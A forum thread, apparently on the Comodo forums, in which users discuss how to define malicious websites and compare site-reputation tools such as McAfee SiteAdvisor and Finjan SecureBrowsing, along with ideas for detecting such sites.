Malicious Sites

Let’s talk Malicious sites. Melih will be involved in this thread because Comodo are already investing into a new infrastructure for such sites! :slight_smile:

Josh

So here we are talking about web based threats, whether is be malacious code, exploits, memory, drive by downloads etc? NOT on access scanning? Let’s see where this goes :slight_smile:

Yep. It will be interesting to see what Comodo comes up with. Hence CMF already covers drive by downloads.

Josh

first question is: What is a malicious site?
Second question: How do current products work for identifying these malicious sites?

Third question: What is Comodo trying to do in this segment?

We have many preventative technologies like CMF, D+ etc. What we are working on (its a pet project at the moment) is a way to identify a malicious website… So the important thing here is a definition of a malicious site. To us its not a site that has a malware available for download (as that is harmless until you download and execute it :slight_smile: ), but a site that Proactively Attacks you, using many different methods/techniques available!

Melih

A malicious site is a malicious site or/and that can redirect you to one or more malware specific sites that can harm your PC. Including: Drive by downloads, pop ups, injections, etc.

They usually scan the site and warn you not to go in there before you enter the site (Site Advisor, link scanner)

I am guessing Comodo will let users enter the site, but allow you to go to trustworthy areas, then if something is malicious the project your creating will catch it.

Josh

Well, most certainly one type of malicious site is one that tricks you into giving out too much personal information (for no purpose other than reselling the info). Such as a “survey,” or “fill out this form” with your vital info “so you can enter our site,” etc.

the question is what do they use to scan the site?
Just standard AV they have and check the files on the site or something else?
Melih

McAfee would use user-submitted sites & prob their own database of malware.

Josh

Make A White List?

So Many Bad Sites Are Increasing these days…
Even Typing “http://forums.comod.com/” can be dangerous…
If a user does not know what to expect the website to “appear”
I, My self has been trying to make a white list currently i have over a million websites…
A black list will only get bigger and bigger, As a white list… clearly slowly increases…

Possibly Make a automated server scaner… which once you visit infected.com is available for purchase - Sedo.com … index.html breaks down and goes through
a system that Comodo has set up and scans and “examines” it…
before it even goes to the “customer/user” machine?

or even just make automated system…
which does the followin…
Once visit a webpage it "Puts it into a virtual mode(So to speak) for a limited time til it has been examined by a product (etc CMF, CAVS, CFP, Defense)** "
and after this limited time it automatically disables the “Virtual mode”… for the user to download/interact with the webpage…and if it is a no no site it will notify the user about it and if it’s a FP the user can send a report to Comodo…

** Creates A Log If It Can/Will Potentially Infect/Intrude The User Machines

I’ll have more ideas …

Sorry for the bad english/spelling,
I’m kind of smashed tonight…

CG

Or Even Make A Comodo Browser…

Haha Soon You’ll be able to make a Windows XP Comodo Version lol

to minimized interring a possible threat sites, I use MCAFEE SITE ADVISOR…

(:LOV) (:LOV) (:LOV)
(:LOV) (:LOV) (:LOV)
(:LOV) (:LOV) (:LOV)

Whitelist? I don’t think that that could be possible for websites, they can just be hijacked and then the user will think the site is safe. Some scripts\code can “Steal” your saved passwords in your browser (I think)

If you stealth a port on your pc it just doesn’t answer or respond to the ping - Maybe there could be a way to “Stealth” the browser in certain aspects so that it does not respond to suspicious requests.

I agree… this is a problem with e.g. NoScript in Firefox, where you build your own white list. If these websites get hijacked you may be vulnerable because NS won’t stop any attacks.


Question: I’ve automatically allowed Opera in D+ by using Clean PC Mode. Now, if I visit a malicious site, will this site be able to make Opera do nasty things on my PC? Or will D+ stop this? At least D+ warns me every time Opera downloads an .exe file. I’m really interested in knowing this - to which extent would D+ stop things that try to sneak out of the D+ safe-listed Opera.

LA

The problem with SiteAdvisor and alike tools (excluding LinkScanner and Finjan), is that they base their warnings on a database. Meaning, that if yesterday, a site has been tagged GREEN, today the site might already have been infected and such tools will still give it a GREEN tag.

If you ask me, such tools give a false sense of security.

Hey LA, When using firefox I am alerted once firefox has installed a plugin - Maybe this is the same for opera if its changed?

DarkButterfly

I’m aware of that. its better to have SITE ADVISOR than never having it… Site Advisor is for my reference only.

(:WIN) (:WIN) (:WIN)
(:WIN) (:WIN) (:WIN)
(:WIN) (:WIN) (:WIN)

Taken from the Finjan site:

Finjan SecureBrowsing™ is an innovative security assistance tool that proactively alerts you when browsing the Web.
It provides you with “security in-the-cloud" by inspecting webpages before you visit them.
Before you access content, it notifies you about potential malicious content hiding behind links of search results, ads and other selected webpages. Finjan SecureBrowsing accesses each of the links and then scans the relevant pages in real time. It uses Finjan’s patented active real-time content inspection technology as well as the anti-virus engine from Kaspersky®. Once the scan is completed, a safety rating is displayed next to the scanned link.

Today’s cybercriminals use the web as a highly effective attack vector for a wide range of illegitimate and malicious activities, including identity theft through keylogging, financial fraud, espionage, and intelligence gathering. As a result, no organization, corporate network or user PC is safe. Finjan’s patented active real-time content inspection technology protects against Crimeware, Web 2.0 attacks, Spyware, Trojans and other malicious content entering corporate networks. It protects the web surfer from accessing webpages containing malicious content that could be used to steal personal and business data and information.

It appears that Finjan utilises a combination of traditional AV scanning and some form of behavioural model to assess sites.Their content
scanning methodology is explained more in detail here:

http://securebrowsing.finjan.com/about.html

The question is: do they simply check the files that exist on that site?

Melih

what does site advisor check for?

Melih

I think it’s similar to Comodo’s Vertification Engine ??? Or am I wrong ? 88)

McAfee SiteAdvisor™ is a security add-on for your Internet Explorer browser that helps you identify sites that are linked to spyware, adware, spam, viruses, browser-based attacks, phishing, or online fraud.
The McAfee SiteAdvisor service is based on a huge database with detailed test results for more than 100,000 pieces of software and covers more than 95% of the world’s Web traffic.
The program integrates with search engine results from popular search engines and also adds an icon to the browser toolbar that indicates whether a site is safe to use, or should be used with caution.
If McAfee SiteAdvisor has negative information for a site, you can review a very detailed report that shows any spam received from that site, harmful downloads, and association with other sites.